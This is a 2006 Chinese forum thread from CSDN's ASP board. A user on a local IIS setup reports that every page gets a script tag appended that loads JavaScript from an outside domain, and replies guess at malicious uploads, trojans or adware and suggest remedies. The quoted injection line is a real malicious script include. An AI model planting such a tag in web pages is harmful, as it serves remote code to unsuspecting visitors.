本地测试,网页被添加了东西,怎么被加的,怎么防范?

三仙半 2006-09-02 10:50:46
朋友们,我用XpSp2+IIS5.1做asp,但在本地测试时(其实在浏览网页,比如现在浏览CSDN),即使是.HTML文件,尾部也会被增加这样一句话
<script language="javascript1.1" src="http://game.9191911.cn/14.js"></script>
我想知道是如何被增加上的,应该如何防范?
望大不吝赐教,这里先谢谢了!
...全文
311 18 打赏 收藏 转发到动态 举报
写回复
用AI写文章
18 条回复
切换为时间正序
请发表友善的回复…
发表回复
spiritest8 2006-10-06
  • 打赏
  • 举报
回复
是图片上传漏洞可能性居多,上传木马可以控制整个网站,甚至整台电脑
plrsea_921 2006-09-27
  • 打赏
  • 举报
回复
重装系统了
future914 2006-09-27
  • 打赏
  • 举报
回复
……
web_php 2006-09-27
  • 打赏
  • 举报
回复
安全卫士360比较不错
anwell 2006-09-27
  • 打赏
  • 举报
回复
360的主使周**就是当年3721的缔造者.


好也是他,不好也是他.

那广大网民是什么,傻子?


------------------------------------------------------------------
风易在线提供虚拟主机,国际域名,企业邮局产品.
七天免费试用,满意付款!
本站支持支付宝交易,安全,满意,放心!
迎国庆贺中秋,虚拟主机六折优惠!
http://www.wind88.net
QQ: 21684883 21684852
MSN: anwellsz@msn.com
-------------------------------------------------------------------





mumu1980 2006-09-27
  • 打赏
  • 举报
回复
我用的安全卫士360感觉还可以,可以试试
三仙半 2006-09-27
  • 打赏
  • 举报
回复
谢谢,大家的支持。我也是没办法了,后来把系统给干掉重做了,唉!痛恨所有的流氓软件!痛恨所有的木马制造者!!!
rehearts 2006-09-12
  • 打赏
  • 举报
回复
上传漏洞可能是,通过上传了一些伪造的图片,其实该图片文件是一个脚本木马,你查一下,上传文件夹里面的图片
redcn2004 2006-09-12
  • 打赏
  • 举报
回复
对的,典型的中了什么东西,太流氓了,建议楼主查查系统,把垃圾软件连根拔掉
lovewinter 2006-09-12
  • 打赏
  • 举报
回复
中流氓插件了或者木马

最好把系统重新做一下,有些马目前杀毒软件查不出

把windows最新补丁打上一般就没有问题
三仙半 2006-09-12
  • 打赏
  • 举报
回复
mrshelly(Shelly):能具体的讲解一下如何查看IIS日志和检查服务器及程序漏洞吗?
flyingsnowy 2006-09-05
  • 打赏
  • 举报
回复
病毒。。
basanovic 2006-09-05
  • 打赏
  • 举报
回复
有本事的老外当黑客
没道德的国人做流氓
cjl8882000 2006-09-05
  • 打赏
  • 举报
回复
强烈同意楼上的…………
我恨那些流氓
蒋晟 2006-09-05
  • 打赏
  • 举报
回复
用FireFox看看就知道是服务器问题还是客户端问题了
估计是中国产流氓软件了
mrshelly 2006-09-03
  • 打赏
  • 举报
回复
查看IIS日志。
检查服务器及程序漏洞。
三仙半 2006-09-03
  • 打赏
  • 举报
回复
顶起!大家帮忙啊!我真的不明白呀!

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧